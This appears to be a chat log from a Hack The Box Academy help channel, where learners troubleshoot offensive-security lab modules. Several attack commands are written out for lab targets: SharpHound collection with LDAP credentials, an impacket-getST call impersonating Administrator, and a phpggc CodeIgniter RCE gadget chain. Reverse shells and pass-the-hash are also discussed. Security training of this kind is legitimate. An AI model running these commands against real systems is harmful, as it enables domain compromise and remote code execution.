WHERE u.hasspn=true
AND u.enabled = true
AND NOT u.objectid ENDS WITH '-502'
AND NOT COALESCE(u.gmsa, false) = true
AND NOT COALESCE(u.msa, false) = true
RETURN u
LIMIT 100

This explains the different outcomes! One thing I still don't understand is why using the latest sharphound version only leads to 1 or 2 kerberoastable users, that still bothers me 😂

Thanks for the info, this makes sense.
I suspected that this is the case since I ran into a similar issue in a different scenario, and the query was the thing that made the difference.
I just never got the chance to test if it's the case or not on that specific lab.

I will attempt to test the latest SharpHound version and see if it will give me the same result as yours.

I am curious, let me know the outcome! For now I would recommend to specifically use SharpHound v1.0.3 (version installed on htb windows workstation), from there on you can just use bloodhound ce in combination with bloodhound legacy queries to get desired results for htb labs

Just ran SharpHound 2.7.1 (which I believe is the latest verison).
It got me the 12 users, just like the old one did.
Idk what was the issue in your case lol.

• I used the query

MATCH (u:User)
WHERE u.hasspn=true
RETURN u
LIMIT 100

and it got me the 13 users as a result, which is what the answer was in HTB's academy.

So yeah Ig everything's running good.

Nice!! But which command did you use? I used .\SharpHound.exe -c All --zipfilename ILFREIGHT

Yes, same command

.\SharpHound.exe -c All --zipfilename htb

--version flag confirms it's 2.7.1

Interesting 🤔 I first ran latest sharphound version via 'open as admin cmd' => powershell.exe, did not work, 2 users. Then ran sharphound from regular powershell session, 2 users. Last attempt, open powershell as admin, still 2 users with bloodhound legacy query. I am confusion. But it works for you!

This powershell instance was being ran as administrator too.

how can i start with hacking

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I'm stuck on the Skills Assessment - Password Attacks challenge.
So far, I got the username and managed to log in via SSH. From there, I was able to ping a Windows host.
I tried tunneling with proxychains and saw open ports like SMB, WinRM, and RDP. I also found two usernames and attempted password spraying against these services, but the password doesn’t seem to work on SMB or WinRM.

Any idea what I might be missing, or could you drop a hint?

This section is written by an AI lmao

https://academy.hackthebox.com/module/243/section/2731

somebody give it a read and lemme know

#cdsa message

aah, that makes sense, no worries

• I can confirm, I was also getting 2 users, so I just did the enumeration manually from PowerShell.

And it was not about PowerShell running as admin, I think that is an issue with the box. Interestingly enough, after some time I was in fact able to see 12 users (bloodhound is not showing krbtgt user apparently anymore). If you have previous AD knowledge, you would logically deduce that there is always in all domains a default krbtgt account. But this section didn't teach that, so...

Did you find a set of credentials or did you just spray with weak pass word list?

nope didnt find any set of creds yet trying password list

Do you want an abstract hint or dm for exact one?

Good Afternoon guys I need help with the module Ai pls

the last skills assessment

What module you try to solve?

You can find walkthrough on Applications of AI in Infosec Skills Assessmen HERE - https://www.youtube.com/@Zetalabs-sec

Good luck!

@void badger https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines
Attacking Enterprise Networks and Intro to Assembly Language are Tier II modules.

Tomorrow i'll try now i'm so tired 🙁 thanks

After trying many times I've been doing this for 7 months

thank so much bro

👍

pm

Is anyone working on Attacking Enterprise Networks: Web Enumeration & Exploitation https://academy.hackthebox.com/module/163/section/1544 ? I cant seem to get EyeWitness to work.

hi
somebody completed the module Password Cracking ?

That tool isnt required

thanks, just worried may need the tool for CPTS and just wondering why I cant get it to work

Hey is anyone able to help me with the AD enumeration and attacks skills assessment part 2. I'm at the part where I'm trying to get the flag in the admin desktop on MS01 I've tried getting the Administrator NTLM hash with mimikatz but I haven't been able to pass the hash with it. The hint says enumeration is an iterative process but when I load PowerView on the meterpreter session I have on SQL01 it says the commands aren't recognized as cmdlets

Hello, I'm having trouble answering the 3rd question in Understanding Log Sources & Investigating with Splunk

Every method I attemp, I get the same wrong answer. The hint isn't getting me any closer.

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

Guys , hello! I wanted to ask which vpn are you using - tcp or udp one? And how often are you regenerating the .ovpn file? I've got stuck at the DNS Footprinting. With a absolutely correct zone transfer command it gave me the absolutely wrong flag in format of ZONE_TRANSFER{bullshit}. Not the HTB{}. Switched from tcp vpn to the udp - and everything worked fine.

I think the hint holds bearing. I recommend having multiple ways to do the same thing, otherwise you end up with a single point of failure, which sounds like your current situation. With all that being said, you likely have what you need, but haven't fully enumerated accounts that you should have the ability to authenticate with.

i have problem in Visualizing Trust Relationships in BloodHound

Its TCPwrapped...Go back to the Firewall and IDS/IPS evasion information page prior to the labs. The command to get the version and the flag is literally in there. IDK how I missed it, but I just finished that lab after 2 hours of trying....

hey im a beginner and I kinda need help with this step on the box

I downloaded the monitor.sh file onto the shell and every time I try to run it I get this output

nevermind I cant post pics but I get this code. Input: "sudo /home/nibbler/personal/stuff/monitor.sh"
output: "'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
"

I ended up using Copilot to get an answer for this. Funny thing is Copilot generated the answer I had initially. I had to give it the hint constraints and do some tweaking before it finally generated the spl that correctly solved the problem. Only thing is, i doubt I would have ever come up with such an elegant solution on my own.

Those errors are normal. Did you check your listener?

yeah I did. it showed a bunch of weird encrypted looking code then it disconnected

Then you likely messed up a step somewhere

so even with those errors the shell should still execute?

Yes, the command should still reach you

ok that's good. it just might be something wrong with my reverse shell script then. I'm gonna retry it again a little bit later

thanks for the help

I'm trying to enumerate user privileges but none of the powerview commands are working for me on SQL01 after importing the module. I keep getting the error The term 'Get-DomainUser' is not recognized as the name of a cmdlet

Could be needing to do import-module activedirectory

If you have access to other hosts you can try running commands from there right?

hi im having issues with the metasploit framework, module "modules"

i'm using the correct exploit but it doesn't seem to be working

it just won't connect to the RHOST

when i search show options

there's not IP next to RHOST

but i'm using the correct target IP

and the correct exploit

and its my correct vpn ip

so i have no idea why it wouldnt work

foun dit

set works, but setg doesn't for whatever reason

was anyone able to get Openvas to work? I can't donwload it on my kali machine.

worked fine for me

sudo apt-get update && apt-get -y full-upgrade

sudo apt-get install gvm && openvas

gvm-setup

gvm-start

I keep getting errors when doing the gvm check-setup

I ran that on the pwnbox in the module about it

rather than doing it on my VM

I'll keep looking thanks!

hey every one.....im Jax, mostly a noob in HTB....i was trying to read a file with wire-shark but it keeps saying I'm not permitted to use it....or update stuff...no wonder im stuck in nood😅

any ideas....

Try sudo

Yo guys i have prob. Im on a box and im on win-rm i run Import-Module .\SharpHound.ps1 and then have been running commands w/ valid creds and nothing back. I know i can run nxc and bloodhound-ce-python but ive heard the ingestors from specterops are better. Been trying hella combos and nothing.

Invoke-Bloodhound -LDAPUser 'xxx' -LDAPPass 'xxx' -CollectionMethod All -Domain htb.local

also tried same w/ exe as ewll

as well

last thing is the nxc bloodhound remote dump just as good as sharphound.exe ran on the machine itself

two questions asking for flags from nmap scan, i only found one. second one's hint saying flag is from web server, but i dont know what script to use. please assist

nvm, i found answer..

Try this

 .\SharpHound.exe -c All --domain <domain> --domaincontroller <DC> --ldapusername “<username>” --ldappassword “<pasword>” --zipfilename <filename>

ok bet ill lyk tmr the nxc actually uses ldap so i just used that. but i still got the lab open so ill lyk tmr. Locked in w/ python rn lol don't feel like spinning up winrm again.

report module, section reporting, how to write up a finding is working horrible... always disconnecting, cant do anything

1. Make sure you don't use the pwnbox and VM at the same time. 2) Try another server or region

Android Fundamentals - Android Emulators
Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)

i was entering the right build number but it showing wrong.

when doing pass the hash, how do i know if i should use psexec smbexec wmiexec and so on? what am i suppose to enum to know

You won't know til you try or enumerate the permissions

the hash doesn't really matter, what matters is if the account has permissions to run psexec, smbexec, wmiexec, etc

suppose we have VPN access into company internal network then how we will perform certain attacks such as LLMNR/NBT-NS Poisoning as it is happening in layer 2?

Hello, who is good at hacking?

Hi, welcome. This channel is for discussion of the modules for Academy. Please read the #rules and follow the instructions in #welcome to gain access to a more appropriate channel for this kind of question.

Check this out: https://www.reddit.com/r/hackthebox/comments/1mwbvgq/is_it_possible_to_use_responder_over_ligolo/

It’s quite annoying to be looking at a seemingly simple flag asking about the os a box is running, looking at it in nmap output and it doesn’t seem to be an acceptable flag. I’ve tried multiple kernel versions and the hint just tells me what I already know

Is this regarding a box?

Yep

Best to ask for help in #boxes then, you'll need to follow the instructions in #welcome to gain access.

Hello guys I would like to know if I subscribe to vip ? Do I get to access the vulnlab machine or note

Those are exclusive to VIP+

Ohhh ok thank you so much

Stack-Based Buffer Overflows on Linux x86 - Take Control of EIP

Examine the registers and submit the address of EBP as the answer.

I don't really know what the question is asking for

I tried submitting the offset of EBP and the value of the register itself after segmentation fault but both are not the answer

Lol

my bad

i did not read carefully enough

solved it

Hi, can anyone help me with Introduction to Windows Evasion Techniques SA2?

Hi everyone, I’m working on the Introduction to NoSQL Injection Skills Assessment II and have hit a bit of a roadblock. I’ve already identified a valid username and successfully triggered the reset functionality. However, when I try to use a time-based injection to enumerate the reset token, it doesn’t seem to work.

Any hints or guidance would be greatly appreciated!

ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] – FreeRDP can reach the host, but the Kerberos authentication fails because no KDC for realm NEXURA.HTB is found. any ideas how i can fix this i am trying to connect with internal ip via proxychains

Identifying SSRF

Hello, is this specific module working? I'm facing some problems : https://academy.hackthebox.com/module/113/section/2139 ?

it working for me though

can you help me please ?

what help you need?

i'm trying to follow the steps but the machine is often crashes and at this point i m encountering an error

rdp session?

yes and some windows error while changing files perm

which tool are you using xfreerdp?

if maybe try remmina

yes but yesterday the tool was perfectly working

i'll try

when I attempt to change the permissions of the Temp folder, I encounter this issue, but the files are still being deleted afterwards

Have not done this module so i dont have any idea of what you are trying to do here?

oh ok changing the perm of the temp file of the user cybervaca

Hello! I need some help understanding the RBCD attack using an existing user (the last chapter in the module https://academy.hackthebox.com/module/25/section/833
).

First, I requested a TGT for the user carole.holmes.

Then I extracted the Ticket Session Key.

After that, I changed the password (the password hash) for the account carole.holmes to match the hash from the Ticket Session Key.

Next, I tried to get a service ticket:

||```
export KRB5CCNAME=carole.holmes.ccache
impacket-getST -u2u -impersonate Administrator -spn cifs/DC01.INLANEFREIGHT.LOCAL -no-pass INLANEFREIGHT.LOCAL/carole.holmes -dc-ip 10.129.205.35

But I get this error:

[] Impersonating Administrator
[] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION (KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user carole.holmes or initial TGT not forwardable

where am i wrong?

anybody ?

Hi guys wassup

can I speak to someone for this module? I'm having some technical issues
Windows Kernel Telemetry & Detection Techniques

what kind of technical issues are you experiencing

Ha jarvis0xq recheck ur commands

In the section "The VAD tree", I don''t see any output in Windbg (after enabling debugging on the Test machine). I was wondering if I could speak to someone to ensure I'm following it right. thank you

did you enable the debugging output

or feel free to dm me

yes. ok thanks will do

Any one can help I'm into skills assessment of password attacks

hello, is there a CPTS Prerequisites path like the SOC Analyst Prerequisites path ?

what do you mean? where is the mistake?

Hey, you can DM me 🙂

im in windows command line module and im stuck with the qn

why isnt this the answer

its skills assestment last qn

@autumn pilot @river grove can you help?

sorry I didnt do this module

Try following the commands in the section, start by verifying that you have successfully added a computer in the domain

Does anyone else have issues with their boxes? Mine keeps on crashing and then can't ping it anymore.

I am trying to perform an attack without adding a fake computer (RBCD from Linux When MachineAccountQuota Is Set to 0)

Can you run describeticket and give the output here

Use a different user, assuming you are doing it when MAQ is set to zero.

I think I realize your problem

which user? I only have access to the user carole.holmes

Can you run it with debug as well

I think I might know the problem

@quartz sundial

can any one help me with this

You need to add it to the trust list I believe using rbcd.py

@quartz sundial

Like dpgg said, follow the sections. Start at this section RBCD from Linux When MachineAccountQuota Is Set to 0 and follow the provided information.

such that DC01 is delegating TO and your created computer account is delegating FROM

You seem to have skipped a step

Who should I add to my trust list? carole.holmes? I tried, but nothing is written about it in the module. @gray yacht I have executed all commands from the "RBCD from Linux When MachineAccountQuota Is Set to 0" block in sequence, what did I miss?

I didn't create a fake computer, why?

Send me a DM

No no I got this

hit me up @quartz sundial

maybe we had a misunderstanding)) I was able to perform a classic attack from the module https://academy.hackthebox.com/module/25/section/833, creating a fake computer and as a result I compromised the domain. now, I am trying to perform an attack in a different way, without creating a fake computer, the attack described in the block "RBCD from Linux When MachineAccountQuota Is Set to 0"

okay

Can you help him out I got confused

Send me a DM when you are able.

thanks @gray yacht !!

turns out i should have used beth.richards but i thought i should have used carole.holmes, since it was this user that was suggested to be used at the end of the module

hi, i am on the module Advanced Deserialization Attacks: Debugging .NET Applications

i am trying to setup an IIS locally (Windows 11) by following the instructions provided. However, my IIS manager does not have the option to add sites.

i have ran IIS manager as administrator + i have no 3rd party antivirus installed - anyone know a fix for this?>

I haven't fully figured out why yet, maybe because user beth.richards has SPN. but the attack was repeated, that's already progress)

1 right click
2 click to add a new Website

Hi, I’m currently going through the LLM Output Attacks module and have been stuck on the Function Calling technique for the past two days. I would really appreciate any guidance or pointers to help me move forward. I’m new here, so apologies in advance if I’ve phrased anything incorrectly.

Hey on attacking thief client applications looking for hidden cred in restart.oracle service

Im VPNing from Australia and this is a joke I keep getting dc unless I use there online machine coming from around its just to slow 😞 has anyone else had this why cant we be give file and just do on own machine this is stupid

If anyone could help please reach out this is pritty dumb trying to do 500 to 700 ms

And thats on there parrot box before rdp to the next machine 😅

Yeah this was ridiculous on tryhackme done same some modules gives the program to run through a vpn then rdp then run debuggers on some 2gb ram vm just stupid has anyone done this module and yous dm me please

hello i just completed the skill assessment - easy of the attacking common services module. I got the flag by compromising the sql service. I think there was another way to get the flag as hinted. can anyone help me with this?

hey guys im trying to do the mcos fundamentals... what mcos device am i supposed to use to answer the questions?

https://academy.hackthebox.com/module/67/section/633
What non-default privilege does the htb-student user have?

whoami /priv - privileges aren't giving me the right answers. I need help

<@&861185840277487616>

Hii I am facing some issue here . Can Anyone tell how to solve.
Add an instruction to the end of the attached code to "xor" "rbx" with "15". What is the hex value of 'rbx' at the end?

this is the attached code :
global _start

section .text
_start:
xor rax, rax
xor rbx, rbx
add rbx, 15

Hello, i'm stuck on a part of the module "Wi-Fi Password Cracking Techniques" in the hybrid mode, im supposed to crack a password with a wordlist and 4digits number following it, im sure that im doing the good thing, but after 10min it still didn't get crack, so idk if im not using the rightwordlist, or doing a bad command

yeah I can help

I think the /opt/wordlist.txt + wordlist be enough

im using the /opt/wordlist.txt and the mask i should use, but it still running after 13min

on the HTB machine ?

yes

I did it on my own host, HTB machines are slow to crack

if you can access a GPU even better

idk, already 13%

show me your mask

can i dm you?

sure

Have you tried doing what the section told you.

No idea what you mean

Anyone??

^

Well thats not the question, nginx is the web framework, WordPress is a content management system

I suggest utilizing a search engine for that 😉

add the --no-update at the end

https

Use http instead

anybody know this?

thats the only way I ve got wpscan to work

Not sure what distinction youre trying to make? Are you saying third party via something like a vpn?

I took that sentence from the fingerprinting module

You mean footprinting?

oh yeah

anyone doing password attacks skill assesment ?

Someone can help me with module intro to c2? im stuck

Hello can someone help me with Intro to Deserialization attacks SA 2

someone here know you're supposed to use a macos deivce in the OS Fundamentals module?

Find the numeric version running on your machine and submit it as the answer. -> what does that mean? what is my machine?

It is recommended to have your own MacOS to use

but is the answere not predetermined? or can you submit whatever?

also i dont have a MacOS

idk I didn't do the module

I believe it can be done without it, but it's recommended to have your own MacOS to complete it

usually if they ask what is your version number they mean from the pwnbox your using or the target

but they dont provide anything in that section

im just gonna try submiting a random version and see if its gonna accept it

alright it accepted a random one i put, ill just move on

can someone give me nudge
on password attacksi, i got into internal network and pivvoted traffic but cant access and of 3 machines

You might need to do some light enumeration on that foothold.

What issues are you having? Can DM if you think it will spoil content.

by that u mean like credential hunting in linux, or nmap on other machine etc.

Historically it isn't super intensive.

You're given all the internal hosts. If you can't nmap a common port used by a domain controller on the domain controller then your pivot isn't working.

i already setup ligolo pivoting and checked all ports etc.

i guess i am missing credentials that i should ve found on pivot host ?

but i wouldnt guess thats the way

Ok then yeah I've you've verified your pivot, I'd start credential searching on that host you have access to. I've also already given you a hint, you just have to pick up on it.

aha i got it i think

found it

checked it before just didnt really look properly

If you're stuck on Task 1 of the Skills Assessment:

Once you have your loop and you want to find the shellcode, remember that there are 14 pieces, and they are all stored on the stack (rsp). Review the 14 pieces as indicated in the "Debugging with GDB" module, using the hex format (x) and the giant (g) size of 8 bytes. If you use a different size, you must reverse the hexadecimal values because of little-endian.

i am missing the Sites dropdown

Hello, i am doing the intro to deserialization attacks SA2 but now im stuck with the RCE part, i achieve a ping by the page functionality but the nc doest work, any hints?

Plz someone help me

It was because of the formatting. Look at the example and try to figure out the right format.

i tried it. like removing dot. replacing dot with _.

you can dm me.

I dont achieve the RCE im using phpggc for CodeIgniter below 4.2.7 but nothing works, it sends me to a page with a 500 HTTP code, any hints?
||phpggc CodeIgniter4/RCE6 system 'ping -c 5 10.10.15.54' -b||

Can I DM anyone on Intro to Whitebox Pentesting Exploit Development?

Do you guys have discussions here wherein you talk about anything under the sun

That's in #general. You'll need to verify your htb account by following the instructions in #welcome.

I cannot chat in general I do not have any htb account

Then you'll need to make one if you want to access most of the server.

Is this like an official htb server ?

yes

Do you guys do vc

Yes there are voice channels

Yall question

Hey guys how do y'all take notes and actually retain the info long-term? I've been getting stuck with learning everyday but never retaining the info and ik note taking helps with that.

I thought this was a pretty good video https://www.youtube.com/watch?v=7LU6m_CF3cQ

yea lol I was watchin that a few hours ago just wanted to ask here to see how other ppl do note taking

yes the MacOS module expects you to use your own MacOS device, it's stated on the module overview

super noob question, I'm not following.. what does STMIP means?

Is that from the solution? I think it's just the target IP.

it's given at the top of the writeup, the acronyms used

Quick question, why does it say incorrect task flag even if it's correct? I'm on tier one 🙁 and i can't proceed.

read and follow #welcome to gain access to #starting-point ; it sounds like you're working on the "starting point" machines

for some reason it isnt accepting the flag. tried checking for whitespace and manually typing it in, still gives me invalid answer. is there a chance that this could be a glitch that needs someone from HTB to look into?

because that's not the right flag, there's another service running that has a flag

oh ... that's intersting. will rerun my scans. thank you

that's the flag for a different service/section

a fair bit of sections in some modules will reuse the same lab (within the same module) with multiple services to enumerate/interact with throughout the module

found the flag! Thank you so much

is it necessary to learn chisel + proxychain? im seeing the discord chat history and many recommend ligolo-ng

ligolo-ng is very simple to use, but personally with chisel I don't use proxychains, ligolo-ng acts as a kind of VPN to simplify things.

is proxychains and chisel a either/or thing? or must it both be used together?
at least thats what im seeing in the password attack module

Sometimes one will work better than the other

http://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5
I usually refer back to this guide

I only manage to solve the issue by setting it up on a vm in Virtual Box. Not sure why it does not work on my host

Just start taking notes of stuff that you find interesting/want to remember for next time. Focus on starting to consistently take notes, then worry about formatting/layout later as you go. Personally use markdown files in Obsidian

Has IIS been installed correctly? Are you using Win 11 Pro?

You can use both together but you can as well use chisel without proxychains depends on you :).

hey i need help with bash scripting module can i dm anyone?

intro to bash scripting

i am not, was that the issue

Try ligolo

I don't know exactly what the differences are, but it's possible

Am I the only one whose virtual machine in the module freezes periodically? I rebooted it several times. It stops pinging for a while, then it pings again

Hey one doubt :- into the password attacks module ! The only way to gain nexura administrator password is performing DC**nc attack on domain with the user *tom

But the irony is if any new commer come and try to do this skill assessment blind he/she don't much able to do because AD attacks modules are way after this password attacks module

So my real concern is:- there is also another way except DCnc attack, to do domain compromise ? Like DCnc is not teached in password attack module 😕 BUT SKILL ASSESSMENTS NEED TO DONE WITH THAT.....

You can dm me if you still need help

you can dm me

Everything needed to pass is taught

Did a little print debugging in Ruby code 😀 After adding couple of debugging statements in request handling method and notices nothing was printed, therefore it wasn't called, therefore something might have changed in base classes or mixins.

Maybe irrelevant now, but for anyone else stuck on this: try a Python HTTP server to transfer...

Thank you for the answer

Hey everyone, I'm a second-year computer science student at university, and I recently started the HTB JCA certification. Although I'm comfortable with the shell, I'm stuck trying to find the right solutions for kernel release (I only got 2 numbers), and the name of network interface (I had 2 but they're wrong)... So anyone could give me some advice, that would be kind. Thanks

Make sure to ssh into the target

Thanks a lot, I'll try once at home, I'm stuck with others things while I'm succeeding in more difficult modules that require a greater level of understanding

hello im doing intro to bash scripting module and im stuck with question

Hey guys anybody doing DACL attacks II? Was wondering how you guys did the SPN Jacking exercise

kali

Hi

Hello guys, i can't leak the private key on Heartbleed Bug, i used TLS-Breaker and Metasploit but despite it's "working", no private key is leaked .. Any hint please ?
https://academy.hackthebox.com/module/details/184?redirect_to_section=1950

Hello !
In the Attacking Common Applications - Attacking ColdFusion, I had to modify the CVE payload, as msfvenom didn't work from the python script.
I generated the shell on the side, then edited the code to remove the name of the shell to the name of my choice.
I am currently running the exploit. It was mentioned that it takes time, but how much time are we talking about ? It's been like 5' and that seems a bit much

EDIT + how it worked : Still haven't found out. It was stuck waiting for the response of the first request. However stopping the script & checking the uplaod directory manually shows that the shell has been uploaded. I received the shell by stopping the .py script and running a listener manually + triggering the shell by clicking on it from the web interface

Hi, I did a Notion template which I used for the Attacking Enterprise Network module and it really helped me to gather information and see attack paths I did not think of during the assessment. I decided to build this template for people doing the same module, CPTS or even pro labs, don’t hesitate to dm me to give me feedbacks 🙂

https://www.notion.so/fr/templates/cpts-oscp-prolabs-notes

Hi guys, I just passed the CPTS. Hope this will encourage those on the same journey.
https://academy.hackthebox.com/achievement/badge/bdd873ff-86fd-11f0-9254-bea50ffe6cb4

Congrats !

I've just started on the platform. I like it 😊

Hey guys the attacking common applications i cant ftp the fatty-client.jar to even attempt on my own pc can anyone help with this please

There servers just no good for this

Vpn to then rdp to then do analysis of file

Anyone out there can help?

Congrats! Some tips for everyone?

Tried share with smb xfreerdp

Try remains too just keeps reconnecting this is stupid

Guys i'm stuck on HTB when we have to use curl to download a php file from inlanefreight.com

I typed curl -s -O inlanefreight.com/download.php

Remove the -O

And use http://inl..

Isn't the O needed for downloading?

Yeah at the end

-O then file output pritty sure

Have u done this module?

Its tier 0

Yeah it is -O then output file

Na but I use curl alot

You dont put -O at the front

Where do i put it?

Curl -S http://site.com -O site.com

Where does the /download.php go?

Current dir

Type pad in terminal thats where be

Have u done this module before?

None of that worked dude

Work for ya?

Nope

Didnt work

Dm me

-o

Lowercase

curl -s -O http://inlanefreight.com/download.php

Has anyone solved the RCE in the blind SQL injection module for CWEE (module/177/section/1765)? I see a couple people had the same issue before but they didnt get any response. I have the same issue where nc.exe gets downloaded but the reverse shell doesn't get through. Are we supposed to use an alternate method?
I ended up figuring it out, but I highly doubt this was the intended way as I had to know an internal path on the server (which I did get through luck).

It says server permanently moved to https or something

Yeah I do curl -s http://inlanefreight.com/download.php -o download.php

It says document has moved https:inlanefreight.com/download.php

But that doesn't give anything either really

So...

Http not https?

Im not sure i do that command it downloads and if its a htb server be http not https

And "pwd" gives me directory its saved in

I tried both http and https

Yea I've been using obsidian for a while too. I just jot down commands that I would need later on

Its not for me

Indeed my bad x)

For zZeez

Are you sure it's inlanefreight.com ? And not inlanefreight.htb or .local ?

Lol i got no idea and could be not being in /etc/hosts

Im on fatty-client server finally downloaded trying to get Java 8 going now to run it hahaha

I think so, i can try htb ig

Just need IP for it for exploiting web vulnerability in thick client applications u done this module?

Ok I figured this out. The module suggests getting nc.exe from a specific github but it doesn't work. I think it's not a spoiler to suggest people try the nc.exe provided by Kali.
Also as a bonus exercise, it's possible uploading a webshell that runs as nt authority\system...

Thankyou guys for your help, someone helped me figure it out

hi guys
i'm at the skills assesment in password attack
i found the root password but with the user 'Administrator' i cant access

i tried rdp,ssh,ldap,winrm but nothing
hints ?

Not knowing what you have done, I would ensure to continuously try to harvest credentials and then validate them across all hosts in scope.

okay
thank you !

with chisel and proxychains i should be able to run things like whoami and pinging internal machines right?

been trying to chisel from the dmz and its connected but not running the commands

Chisel and proxychains just route your traffic to the internal network. It can give you access to an internal machine where you can run commands.

Anyone know how to write the file types you want with the -x command using snaffler in the hunting network shares module

I’m getting errors everytime and I’ve tried 3 different types of ways to type them